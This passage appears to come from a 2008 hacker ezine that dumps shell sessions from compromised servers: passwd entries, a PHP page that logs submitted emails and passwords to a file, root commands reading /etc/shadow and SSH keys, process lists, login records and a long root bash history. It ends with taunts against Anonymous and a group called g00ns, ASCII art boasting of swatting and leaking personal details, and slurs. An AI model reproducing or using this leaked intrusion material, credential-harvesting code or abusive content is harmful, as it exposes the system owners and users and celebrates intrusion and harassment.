-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
-smmsp:*:25:25:Sendmail Submission
-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
-mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
-$ ls -al /usr/home
-total 8
-drwxr-xr-x 4 root wheel 512 Mar 8 07:48 .
-drwxr-xr-x 17 root wheel 512 Mar 8 07:48 ..
-drwxr-xr-x 2 general general 512 Mar 8 07:48 general
-drwxr-xr-x 2 picatta picatta 512 Mar 8 07:47 picatta
-$ cd ~picatta
-$ ls -al
-total 20
-drwxr-xr-x 2 picatta picatta 512 Mar 8 07:47 .
-drwxr-xr-x 4 root wheel 512 Mar 8 07:48 ..
--rw-r--r-- 1 picatta picatta 751 Mar 8 07:47 .cshrc
--rw-r--r-- 1 picatta picatta 248 Mar 8 07:47 .login
--rw-r--r-- 1 picatta picatta 158 Mar 8 07:47 .login_conf
--rw------- 1 picatta picatta 373 Mar 8 07:47 .mail_aliases
--rw-r--r-- 1 picatta picatta 331 Mar 8 07:47 .mailrc
--rw-r--r-- 1 picatta picatta 766 Mar 8 07:47 .profile
--rw------- 1 picatta picatta 276 Mar 8 07:47 .rhosts
--rw-r--r-- 1 picatta picatta 975 Mar 8 07:47 .shrc
-$ cd ~general
-$ ls -al
-total 20
-drwxr-xr-x 2 general general 512 Mar 8 07:48 .
-drwxr-xr-x 4 root wheel 512 Mar 8 07:48 ..
--rw-r--r-- 1 general general 751 Mar 8 07:48 .cshrc
--rw-r--r-- 1 general general 248 Mar 8 07:48 .login
--rw-r--r-- 1 general general 158 Mar 8 07:48 .login_conf
--rw------- 1 general general 373 Mar 8 07:48 .mail_aliases
--rw-r--r-- 1 general general 331 Mar 8 07:48 .mailrc
--rw-r--r-- 1 general general 766 Mar 8 07:48 .profile
--rw------- 1 general general 276 Mar 8 07:48 .rhosts
--rw-r--r-- 1 general general 975 Mar 8 07:48 .shrc
-$ cd /usr/local/www/apache22/data/auth
-$ ls -al
-total 8
-drwxr-xr-x 2 root picatta 512 Mar 8 17:41 .
-drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 ..
--rwxr-xr-x 1 root picatta 2 Mar 5 12:47 account.txt
--rwxr-xr-x 1 root picatta 169 Mar 5 12:47 login.php
-$ cat account.txt
-$ cat login.php
- $email = $_POST['email'];
- $password = $_POST['password'];
- $fw = fopen('account.txt', 'a');
- fwrite($fw, $email . ":" . $password . "\n");
- fclose($fw);
-$ ls -al /var/mail
-total 4
-drwxrwxr-x 2 root mail 512 Mar 8 22:05 .
-drwxr-xr-x 24 root wheel 512 Mar 8 22:05 ..
--rw------- 1 cyrus cyrus 0 Mar 8 22:05 cyrus
--rw------- 1 general general 0 Mar 8 07:48 general
--rw------- 1 mysql mysql 0 Mar 8 16:38 mysql
--rw------- 1 picatta picatta 0 Mar 8 07:47 picatta
-Well, that was fun...
-Remember, you are not as untouchable as you think you are. As long as you have a
-website up somewhere or are IRC'ing on public networks (btw, do you honestly
-think that EFNet provides a secure communications channel?) you are within the
-reach of those who would wish you harm.
-To be perfectly honest, you indoctrinate your members just as much as the
-supposed evil CoS that you fight against. I honestly don't see the difference
-between your methods and those that you allege they use.
-Your actions are childish. You attack sites and people that have done nothing
-to you and whom you have no battle with. Hell, a lot of the time you don't even
-attack the right target. That speaks volumes about your collective abilities.
-Again, we beseach you to remember that you are *not* untouchable. While 99% of
-the time you will anger people who have no power to hit back, or who have
-no friends with the ability to retaliate, the remaining 1% of the time you will
-anger people who can and will hurt you.
-Knock off this Chanology crap and go back to posting on 4chan and playing
-CounterStrike. You're in a world you know nothing about and you do not belong
-We would have dumped your MediaWiki DB but it was full of crap and only had 32
-registered users.
-This was for you X. Hopefully it helps.
-# __ #
-# .--------.|__|.----.----.-----. #
-# | || || __| _| _ | #
-# |__|__|__||__||____|__| |_____| #
-# __ #
-# .-----.-----.-----.|__|.-----. #
-# | _ | -__| || ||__ --| #
-# | __|_____|__|__||__||_____| #
-# |__| #
-# #
-# | # ________________________ #
-# | [] []# | | #
-# | # |<mp> r0fl3 i juST g0t | #
-# FUCK YOU! Co$! | [] []# |bunCH of RFI's from b0ts| #
-# \ | # |i r teh le3ats | #
-# \ | ____# | | #
-# lulz O_O i just | |___# |<sk1d> LUCKY!!11! | #
-# raged you so | # | | #
-# hard!! | ? __# '-.____________________.-' #
-# / | o | # |________| #
-#___8=D________________|__|_|_# ______/__________\______ #
-#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/# |________________________| #
-# # |(type type) | #
-#- - - - - - - - - - # | \ _____ _____ | #
-# # | / ' \ | #
-# | # | #
-# r0flzc0ptu3z i just | [] []# SHUT UP Co$!! | [] []#
-# / | # / Thats IT! #
-# swated that f4g and | [] []# \ / | [] []#
-# \ | # \ I'M CALLING| #
-# \ | ____# \ \ | ____#
-# dropp3d his doc's | |___# \ The | |___#
-# i iz so0 |Go # / \| #
-# l33t!! |Away__# Whats zf0no? zf0no___#
-# / | 'o | # / | 'o | #
-# # #
-#- - - - - - - - - - #- - - - - - - - - - #
-# # #
-# #
-# ,-. __ #
-# ,' `---.___.---' `. #
-# ,' ,- `-._ #
-# ,' / \ .- #
-# ,\/ / zf0 + Rhino => zf0no \\ (( #
-# )`._)>) | \\// #
-# `>,' _ \ / |/ *-_ #
-# ) \ | | zf04 | | o `-. #
-# , / \ | `. | | o * (`-' #
-#\ \`-' )-| `. | / '- .' #
-#\`-` .` _/ \ _ )`-.___.--\ / O _`-._ #
-#_\_ ,'_____\ `.__/___________`. \_____,'^, c-)__#
-#__/ , ,'/_/_/_/_/\ /`/_/_/_/_/_/_/\ /_/_/(_`-' ^-'`)#
-# \__ / _) ( _) ( (^_ - _ |#
-#- -`--' - - - -/____\- - - - -/____\-(_,-. 8=D |#
-# `-_______* #
-# #
-# Once Again Micro Penis Is #
-# __ #
-# .-----.--.--.--.-----.-----.--| | #
-# | _ | | | | | -__| _ | #
-# | __|________|__|__|_____|_____| #
-# |__| #
-# (c) zf0 2008#
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 g00ns zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-z3r0 -> tribal: its possible someone hacked the user account
-z3r0 -> tribal: but doubtful
-tribal -> z3r0: yeah but if thats true
-tribal -> z3r0: they wouldn't be able to change the bash history
-Current g00ns shell passwords:
-[root@demon2 ~]# uname -a; id
-Linux #11 SMP Mon Feb 11 22:15:20 PST 2008 i686 i686 i386 GNU/Linux
-uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-[root@demon2 ~]# cat /etc/shadow
-[root@demon2 ~]# ps auxwww | grep -v root | grep -v mysql
-ftp 2319 0.0 0.0 2736 1424 ? Ss Mar18 0:00 proftpd: (accepting connections)
-dbus 3183 0.0 0.0 2784 672 ? Ss Feb11 0:00 dbus-daemon --system
-mail 3813 0.0 0.0 8760 712 ? Ss Feb11 0:36 /usr/sbin/exim -bd -q15m -oP /var/run/
-avahi 4434 0.0 0.0 2600 648 ? Ss Feb11 0:00 avahi-daemon: running [demon2.local]
-68 4450 0.0 0.0 5276 736 ? Ss Feb11 0:00 hald
-named 4618 0.0 0.4 48712 8296 ? Ssl Feb11 55:55 /usr/sbin/named -u named
-bnc 5470 0.0 0.0 5568 1560 ? S Feb11 0:53 ./psybnc
-apache 12745 0.0 0.3 113532 7368 ? Ss Apr16 0:00 lsphp -c /usr/local/lib
-bnc 14297 0.0 0.1 5544 2144 ? S Apr19 0:04 ./psybnc psybnc.gso.conf
-nobody 15071 0.0 0.0 8708 1292 ? Ss Apr01 0:00 /usr/local/directadmin/directadmin d
-510 16899 0.0 0.1 6728 3232 ? S Apr14 0:00 /home/excodeirc/Unreal3.2/src/ircd
-evilcode 17493 0.0 0.8 19904 17704 ? S Apr19 1:08 /home/evilcode/newircd/Unreal3.2.7/src/ircd
-egg 20683 0.0 0.2 17204 5172 ? Sl Apr14 7:14 ./eggdrop-1.6.18 v0ltr0n.conf
-egg 20745 0.0 0.1 13380 3432 ? Sl Apr14 0:02 ./eggdrop sentry.conf
-egg 20748 0.0 0.1 13544 3420 ? Sl Apr14 0:00 ./eggdrop boneless.conf
-egg 20758 0.0 0.1 13404 3396 ? Sl Apr14 0:00 ./eggdrop keebler.conf
-egg 20770 0.0 0.1 4412 3428 ? Ss Apr14 0:31 /home/egg/efnet/fight hacker
-egg 20773 0.0 0.1 3548 2588 ? Ss Apr14 0:19 /home/egg/efnet/fight logic
-egg 20776 0.0 0.1 3588 2692 ? Ss Apr14 0:17 /home/egg/efnet/fight bloo
-egg 20779 0.0 0.1 3552 2640 ? Ss Apr14 0:18 /home/egg/efnet/fight etho
-egg 20793 0.0 0.1 3564 2720 ? Ss Apr14 0:17 /home/egg/efnet/fight notgay
-egg 20798 0.0 0.1 3576 2676 ? Ss Apr14 0:24 /home/egg/efnet/fight hthbot
-513 23089 0.0 0.1 73380 2388 ? SNl Apr16 0:26 ./server_linux
-513 23913 0.0 0.2 50844 5016 ? SNl Apr16 0:00 ./server_linux
-apache 28366 0.0 0.6 121208 14104 ? S 13:11 0:00 lsphp -c /usr/local/lib
-nobody 29950 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d
-nobody 29960 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d
-g00ns83 29999 0.0 0.5 114628 10976 ? S 13:26 0:00 lsphp -c /usr/local/lib
-sn00g3s 30011 0.9 0.5 114844 11788 ? S 13:26 0:00 lsphp -c /usr/local/lib
-every 30024 1.6 0.5 114452 12264 ? S 13:26 0:00 lsphp -c /usr/local/lib
-nobody 30111 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d
-nobody 30168 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d
-nobody 30170 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d
-apache 32186 0.0 0.6 16400 12960 ? S Apr16 4:36 lshttpd
-[root@demon2 ~]# ls -al
-total 18128
-drwxr-x--- 14 root root 4096 Mar 27 16:14 .
-drwxr-xr-x 27 root root 4096 Mar 11 00:10 ..
--rw-r--r-- 1 root root 16777216 Sep 17 2004
--rw------- 1 root root 1077 Jul 31 2007 anaconda-ks.cfg
-drwxr-xr-x 2 root root 4096 Sep 13 2007 ani
--rw------- 1 root root 9305 Apr 21 13:23 .bash_history
--rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
--rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
--rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
--rw-r--r-- 1 root root 337529 Apr 17 2006 Bastille-3.0.9-1.0.noarch.rpm
-drwxrwxrwx 5 1000 1000 12288 Mar 17 19:47 c-ares-1.5.1
--rw-r--r-- 1 root root 445312 Nov 21 02:14 c-ares-1.5.1.tar.gz
--rw-r--r-- 1 root root 20136 Dec 19 19:30 cores
-drwxr-xr-x 4 root root 4096 Feb 23 19:17 .cpan
-drwxr-xr-x 5 root root 4096 Feb 10 12:56 csf
--rw-r--r-- 1 root root 238005 Jan 21 09:19 csf.tgz
--rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
-drwx------ 2 root root 4096 Jan 25 16:29 .elinks
--rw-r--r-- 1 root root 8192 Jan 6 17:37 flood
--rw-r--r-- 1 root root 13333 Jul 31 2007 install.log
--rw-r--r-- 1 root root 2551 Jul 31 2007 install.log.syslog
--rw-r--r-- 1 root root 12033 Jan 6 17:30 ips
--rw------- 1 root root 45 Apr 19 14:04 .lesshst
-drwxr-xr-x 4 root root 4096 Dec 31 01:35 lynis
--rw-r--r-- 1 root root 46388 Dec 26 11:13 lynis-1.0.6.tar.gz
--rw-r--r-- 1 root root 754 Feb 10 17:12 Makefile
--rw-r--r-- 1 root root 0 Feb 10 17:12 Module.symvers
--rw------- 1 root root 41 Jan 31 02:49 .my.cnf
--rw------- 1 root root 419 Sep 29 2007 .nessusrc
--rw-r--r-- 1 root root 51 Sep 29 2007 .nessusrc.cert
--rw-r--r-- 1 root root 656 Jan 6 17:37 new
--rw-r--r-- 1 root root 656 Jan 6 17:38 new1
-drwxr-xr-x 3 root root 4096 Mar 25 13:40 newircd
--rw-r--r-- 1 root root 1462 Aug 19 2007 opt.php
--rw-r--r-- 1 root root 3502 Feb 10 16:03 ptpatch2008.c
--rw-r--r-- 1 root root 5704 Feb 10 17:12 ptpatch2008.ko
--rw-r--r-- 1 root root 126 Feb 10 17:12 .ptpatch2008.ko.cmd
--rw-r--r-- 1 root root 870 Feb 10 17:12 ptpatch2008.mod.c
--rw-r--r-- 1 root root 3404 Feb 10 17:12 ptpatch2008.mod.o
--rw-r--r-- 1 root root 11168 Feb 10 17:12 .ptpatch2008.mod.o.cmd
--rw-r--r-- 1 root root 3080 Feb 10 17:12 ptpatch2008.o
--rw-r--r-- 1 root root 16774 Feb 10 17:12 .ptpatch2008.o.cmd
-drwxrwxr-x 3 666 666 4096 Sep 22 2007 rkhunter-1.3.0
--rw-r--r-- 1 root root 252011 Sep 22 2007 rkhunter-1.3.0.tar.gz
--rw------- 1 root root 1024 Jan 31 05:43 .rnd
-drwxr-xr-x 4 1000 1000 4096 Nov 29 14:48 rootcheck-0.7
--rw-r--r-- 1 root root 42488 Mar 17 2006 rootcheck-0.7.tar.gz
-drwx------ 2 root root 4096 Feb 10 12:55 .ssh
-drwxr-x--- 2 root root 4096 Dec 11 17:39 .steam
--rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-drwxr-xr-x 2 root root 4096 Feb 10 17:12 .tmp_versions
--rw-r--r-- 1 root root 42596 Aug 9 2007
--rw-r--r-- 1 root root 11623 Jan 6 17:36 udpflood
--rw-r--r-- 1 root root 12033 Jan 6 17:30 udpips
-[root@demon2 ~]# last -n 30
-root pts/1 74-34-107-191.ds Mon Apr 21 03:44 - 13:23 (09:39)
-andrei@t ftpd27076 Sun Apr 20 17:01 - 17:07 (00:05)
-andrei@t ftpd21033 Sun Apr 20 16:06 - 16:11 (00:05)
-andrei@t ftpd18185 Sun Apr 20 15:40 - 15:56 (00:15)
-andrei@t ftpd14422 Sun Apr 20 15:04 - 15:20 (00:16)
-every ftpd13689 Sun Apr 20 09:56 - 10:03 (00:07)
-bnc pts/1 Sat Apr 19 20:27 - 20:31 (00:04)
-bnc pts/1 Sat Apr 19 17:53 - 18:39 (00:45)
-bnc pts/2 Sat Apr 19 15:03 - 15:06 (00:02)
-root pts/2 ip70-180-48-83.b Sat Apr 19 10:35 - 11:25 (00:50)
-every ftpd20255 Fri Apr 18 15:42 - 15:42 (00:00)
-every ftpd18019 Fri Apr 18 15:26 - 15:41 (00:15)
-root pts/0 fl-71-51-173-254 Wed Apr 16 19:52 - 20:43 (00:50)
-andrei@t ftpd32363 Wed Apr 16 17:33 - 17:37 (00:04)
-root pts/0 fl-71-51-173-254 Wed Apr 16 17:28 - 19:09 (01:41)
-andrei@t ftpd30547 Wed Apr 16 17:18 - 17:29 (00:11)
-andrei@t ftpd30546 Wed Apr 16 17:18 - 17:23 (00:05)
-root pts/0 fl-71-51-173-254 Tue Apr 15 21:14 - 21:57 (00:42)
-root pts/0 fl-71-51-173-254 Mon Apr 14 22:23 - 23:11 (00:47)
-root pts/0 fl-71-51-173-254 Mon Apr 14 13:46 - 14:28 (00:42)
-kl@60z.o ftpd10215 Mon Apr 14 00:32 - 00:32 (00:00)
-andrei@t ftpd19694 Sun Apr 13 20:40 - 20:45 (00:05)
-andrei@t ftpd12210 Sun Apr 13 19:22 - 19:36 (00:13)
-andrei@t ftpd10428 Sun Apr 13 19:03 - 19:11 (00:07)
-andrei@t ftpd9290 Sun Apr 13 18:52 - 18:57 (00:05)
-andrei@t ftpd9291 Sun Apr 13 18:52 - 18:57 (00:05)
-root pts/0 ip70-180-48-83.b Sat Apr 12 11:39 - 11:40 (00:00)
-root pts/0 ip70-180-48-83.b Sat Apr 12 10:02 - 10:06 (00:03)
-root pts/0 fl-71-51-173-254 Thu Apr 10 13:32 - 13:45 (00:12)
-root pts/0 fl-71-51-173-254 Mon Apr 7 17:43 - 18:36 (00:53)
-wtmp begins Sun Mar 2 09:43:08 2008
-[root@demon2 ~]# cat /etc/issue
-CentOS release 5 (Final)
-Kernel \r on an \m
-[root@demon2 ~]# cat .bash_history
-passwd g00ns83
-cd /home
-ls pr0be
-cd g00ns83
-cd public_html
-nano in.php
-ls katalyst/
-nano includes/config.php
-nano includes/config.php
-chown includes/config.php g00ns83
-chown g00ns83 includes/config.php
-ls includes
-ls -o includes
-ls -o
-ls image -o
-ls -o image
-chown g00ns83 *
-cd /
-makeuser cunt
-adduser cunt
-passwd cunt
-cd /home/sn00g3s
-cd public_Html
-cd public_html
-mkdir hid
-nano hid/index.php
-chown sn00g3s
-chown sn00g3s *
-ls -o
-ls hid
-rm -rf hid
-cd /home/g00ns83/public_Html
-cd /home/g00ns83/public_html
-mkdir tribal
-cd tribal
-nano index.php
-rm index.php
-nano index.php
-rm index.php
-nano index.php
-rm index.php
-nano index.php
-cd /home/g00ns83
-chown g00ns83 *
-ls -o
-cd /home
-passwd cunt
-cd /home/cunt
-tar -xzf sc_serv_1.9.8_Linux.tar.gz
-nano sc_serv.conf
-sudo cunt
-su cunt
-cd unrealold/
-cd /home/excodeirc
-cd Unreal
-cd Unreal3.2
-nano unrealircd.conf
-ls -o
-cd /home/evilcodeirc
-cd /home
-cd evilcode
-cd Unreal3.2/
-nano unrealircd.conf
-cd /home/excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-ls -o
-cd /hom
-cd /home
-ls -o
-ls tmp
-ls asbestos
-cd asbestos
-cd domains
-cd /
-ls tmp
-ps -aux | grep ircd
-netstat | grep ircd
-csf -d
-nano /etc/csf/csf.allow
-csf -d
-csf -r
-csf -d
-csf -c
-csf -r
-csf -d
-nano /etc/csf/csf.allow
-csf -d
-ls -o
-ls root
-cd /home/pr0be
-rm -rf irssi-0.8.12
-rm irssi-0.8.12.tar.gz
-userdel -f pr0be
-cd /home
-useradd tribal
-chown cunt *
-su cunt
-passwd tribal
-nano /etc/passwd
-cd /home/tribal
-su tribal
-cd /home/tribal
-su tribal
-cd /
-nano /etc/csf/csf.deny
-csf -r
-cd /home
-cd excodeirc/
-cd Unreal
-cd Unreal3.2
-nano unrealircd.conf
-nano unrealircd.conf
-cd /home
-cd evilcode/
-cd Unreal3.2/
-nano unrealircd.conf
-make install
-su tribal
-cd /home/excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-cd /home/evilcodeirc
-cd /home/evilcoders
-cd /home
-cd evilcode/
-cd Unreal3.2/
-nano unrealircd.conf
-nano unrealircd.conf
-cd /home/excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-nano unrealircd.conf
-nano /etc/csf/csf.deny
-csf -a /etc/csf
-csf -r
-cd /
-ls etc
-ls var
-ls bin
-ls * | grep ddos
-nano /etc/csf/csf.deny
-nst | grep
-netstat | grep
-tcodump -nn -vv
-tcpdump -nn -vv
-netstat | grep
-netstat | grep
-ddos syng
-ddos synd
-ps -aux
-kill -9 5174
-ps -aux
-ls /home
-cd /home/evilcode
-cd Unreal3.2
-./unreal start
-ps -aux
-kill -9 3549
-ps -aux
-ls ../
-ls ../../
-su evilcode
-ps -aux
-ps -aux
-cd ../
-cd ../
-cd evilcode
-cd Unreal3.2
-nano unrealircd.conf
-cd ../../
-cd excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-su excodeirc
-cd /home/excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-csf -d
-./unreal stop
-./unreal start
-nano unrealircd.conf
-cd /home/evilcoder
-cd /home
-cd evilcode/
-cd Unreal3.2/
-nano unrealircd.conf
-cd /home/excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-nano unrealircd.conf
-cd /etc/csf
-nano csf.deny
-nano unrealircd.conf
-cd /home/excodeirc/Unreal3.2
-nano unrealircd.conf
-nano unrealircd.conf
-cd /home
-cd pr0be/
-su pr0be
-su pr0be
-nano etc/passwd
-nano /etc/passwd
-cd /home/tribal
-su tribal
-cd /root
-tar -xzf c-ares-1.5.1.tar.gz
-cd c-ares-1.5.1
-make install
-cd /home/tribal
-su tribal
-cd /home/excodeirc
-cd Unreal3.2
-./unreal stop
-nano unrealircd.conf
-./unreal start
-cd /home
-cd evilcode/
-cd Unreal3.2/
-nano unrealircd.conf
-cd /home/excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-cd /home/excodeirc
-rm -rf denora-1.2.0-RC4
-rm denora-1.2.0-RC4.tar.gz
-ls psybnc
-rm psybnc/
-rm -rf psybnc/
-rm -rf BULLSHIT/
-cd /home/evilcode
-cd Unreal3.2/
-nano ircd.motd
-chown evilcode *
-cd /home/excodeirc
-cd Unreal3.2
-chown excodeirc *
-nano unrealircd.conf
-cd /
-nano unrealircd.conf
-ls /root
-csf -d
-ddos 10
-csf -c
-csf -l
-cd /
-cd /home/evilcode
-cd unreal3.2
-cd Unreal3.2
-nano unrealircd.conf
-cd ../
-cd ../
-cd excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-sh tuning*
-cd /home
-cd excodeirc
-mkdir hightechhost
-cd hightechhost/
-tar zxvf eggdrop1.6.18.tar.gz
-cd eggdrop1.6.18
-make config
-su excodeirc
-chown excodeirc *
-su excodeirc
-cd /home
-cd excodeirc
-cd hightechhost/
-cd eggdrop1.6.18
-ls -o
-su excodeirc
-cd /
-cd home
-cd egg
-cd eggdrop
-su egg
-uname -a
-id egg
-su egg
-netstat | grep 33162
-killall fight
-killall fight
-ps -aux
-su egg
-uname -a ; id egg
-su egg
-cd /home/egg
-cd efnet/
-su egg
-cat cores
-cd /home
-cd evilcode/
-cd Unreal3.2/
-nano unrealircd.conf
-nano unrealircd.conf
-nano unrealircd.conf
-nano unrealircd.conf
-nano unrealircd.conf
-nano unrealircd.conf
-nano unrealircd.conf
-cd /home/excodeirc
-cd Unreal
-cd Unreal3.2
-nano unrealircd.conf
-cd /home/evilcode
-cd Unreal3.2/
-nano unrealircd.conf
-cd /home/excodeirc
-cd Unreal3.2
-nano unrealircd.conf
-cd /home/evilcode
-cd Unreal3.2/
-nano unrealircd.conf
-./unreal stop
-./unreal start
-ps -aux | grep ircd
-kill 3952
-kill 10281
-ps -aux
-kill 12472
-killall ircd
-./unreal start
-./unreal start
-cd $user
-mkdir newircd
-cd newircd
-tar xzf Unreal3.2.7.tar.gz
-cd Unreal3.2.7
-cd /home
-cd evilcode/
-su evilcode
-ps -aux | grep ircd
-cd /home
-cd evilcode/
-cd newircd/
-su evilcode
-cd /
-cd evilcode
-cd /home
-cd evilcode/
-netstat -a
-su evilcode
-su evilcoder
-su evilcode
-cd /
-cd /home
-cd evilcode
-cd newircd/
-cd Unreal3.2.7
-su evilcode
-cd /
-cd /home/evilcode
-cd newircd
-cd Unreal3.2.7
-nano unrealircd.conf
-cd /
-cd home
-cd excodeirc/
-cd Unreal3.2
-nano unrealircd.conf
-./unreal stop
-./unreal start
-./unreal start
-./unreal stop
-nano unrealircd.conf
-./unreal start
-./unreal stop
-./unreal stop
-nano unrealircd.conf
-passwd sn00ges
-passwd sn00g3s
-cat ircd.conf
-cat ircd.log
-netstat -a
-netstat -a
-cd /
-cd evilcode
-cd /home
-cd evilcode/
-cd newircd/
-su evilcode
-csf -a /etc/csf
-last | grep root
-cat /boot/grub/grub.conf
-cd /usr/src
-rm -rf linux*
-tar zxvf kernel.ta.gz
-tar zxvf kernel.tar.gz
-ln -s linux- linux
-cd linux
-rm -rf .config
-mv grsec .config
-ps -aux ; grep ircd
-cd /home
-cd evilcode
-su evilcode
-cd /
-ps -aux
-kill 19912
-kill 11341
-ps -aux
-kill 11341
-kill 11341
-ps -aux
-kilall fight
-kill fight
-kill 3534
-kill 3537
-kill 3540
-kill 3543
-kill 3546
-kill 3549
-ps -aux
-kill 1439
-kill 1499
-ps -aux
-netstat -a
-ls home
-cd home
-ls pvannet
-ls pvannet/public_html
-ls aosw
-ls aosw/public_html
-csf -a /etc/csf
-nano /etc/csf/csf.deny
-cd /home
-cd g00ns83
-ls public_html/
-cd /
-cd home
-ls g00ns83/backup
-mv g00ns83/backup/oldlayout g00ns83/public_html
-cd /home/evilcode
-cd newircd/
-su evilcode
-netstat -a
-ddos 10
-csf -r
-nano /etc/csf/csf.deny
-cd /
-cd /
-cd /evilcode
-cd /home/evilcode
-cd newircd/
-cd Unreal3.2.7
-su evilcode
-cd /
-cd /home
-cd evilcode/
-cd newircd/
-cd Unreal3.2.7
-su evilcode
-cd ../../
-ls evilcode
-ps -aux
-cd /home
-cd evilcode
-cd Unreal3.2
-ps -aux
-su evilcode
-cd /home/evilcode
-cd newircd
-cd unreal3.2.7
-cd Unreal3.2.7
-su evilcode
-cd /
-cd /home
-cd evilcode/
-cd newircd
-cd Unreal3.2.7
-su evilcode
-cd /
-cd home
-cd excodeirc/
-mv Unreal3.2 privateirc
-mv privateirc/ Unreal3.2
-cp Unreal3.2 privateircd
-cp Unreal3.2 privateircd
-ls Unreal
-ls Unreal3.2
-su excodeirc
-cd /
-cd /home
-cd egg/
-cd eggdrop
-nano v0ltr0n.conf
-nano v0ltr0n.chan
-./eggdrop-1.6.18 v0ltr0n.conf
-su egg
-passwd g00ns83
-cd /
-make install
-su sixtyz
-su sixtyz
-cd /home/sixtyz
-mkdir wee
-cd wee
-su sixtyz
-su sixtyz
-cd /
-su sixtyz
-su sixtyz
-cd /
-cd /home
-cd g00nsts395/
-cd ts
-su g00nsts395
-ps -aux
-cd /home
-cd evilcode
-cd newircd
-cd Unreal3.2.7
-nano unrealircd.conf
-su evilcode
-last \ grep root
-cd /var/log/httpd/domains
-cat | grep 403
-cat | grep http
-cat | grep regime
-cat | grep c99
-cat | grep shell
-cat | grep 406
-cat | grep 403
-cat | grep 403
-[root@demon2 ~]# ls -al .ssh
-total 24
-drwx------ 2 root root 4096 Feb 10 12:55 .
-drwxr-x--- 14 root root 4096 Mar 27 16:14 ..
--rw------- 1 root root 668 Jul 31 2007 id_dsa
--rw-r--r-- 1 root root 612 Jul 31 2007
--rw-r--r-- 1 root root 2630 Apr 14 11:40 known_hosts
-[root@demon2 ~]# cat .ssh/*
-ssh-dss AAAAB3NzaC1kc3MAAACBAKv7MUvQd3w42IE2L0fAv+uBlzIiL9wdtuFn9Kt
- ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAz6mhC9bjyFZ4EYXzRu2C
-bLxYI+06Nwtk3fovpKwo+b/DmfcHaF4Lkm96pWpuhc6oduxh6ySvlviw==, ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA
-oHcIh30tOyOUoPcg3KTbk7gcInMGl3k7IOTZHI17wqOiNu1qIWYcGr1Tw==, ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAnv
-[]:5000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvmD6suMeQqo2o
-[]:9000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAneqXXAJ+LhaK
-[root@demon2 ~]# cd /home
-[root@demon2 home]# ls -al
-total 252
-drwx--x--x 50 root root 4096 Mar 27 16:19 .
-drwxr-xr-x 27 root root 4096 Mar 11 00:10 ..
-drwx------ 2 40zzz 40zzz 4096 Dec 21 21:57 40zzz
-drwx--x--x 17 admin admin 4096 Feb 11 22:44 admin
-drwx--x--x 6 alliancedn alliancedn 4096 Aug 1 2007 alliancedn
-drwx--x--x 8 aosw aosw 4096 Aug 1 2007 aosw
--rw------- 1 root root 13312 Apr 21 05:01
--rw------- 1 root root 13312 Apr 21 05:01 aquota.user
-drwxr-xr-x 3 root root 4096 Jan 14 00:10 asbestos
-drwx--x--x 9 barnseo barnseo 4096 Mar 5 23:19 barnseo
-drwx--x--x 6 bnc bnc 4096 Aug 8 2007 bnc
-drwx--x--x 6 bored bored 4096 Aug 1 2007 bored
-drwx--x--x 6 churc0 churc0 4096 Aug 1 2007 churc0
-drwx--x--x 6 connors connors 4096 Aug 1 2007 connors
-drwx------ 3 cstest cstest 4096 Dec 11 17:29 cstest
-drwx------ 2 cunt cunt 4096 Mar 13 17:26 cunt
-drwx--x--x 5 dougie dougie 4096 Dec 20 16:28 dougie
-drwx--x--x 10 egg egg 4096 Mar 23 11:26 egg
-drwx--x--x 6 every every 4096 Aug 1 2007 every
-drwxr-xr-x 9 evilcode evilcode 4096 Mar 25 13:40 evilcode
-drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 excodeirc
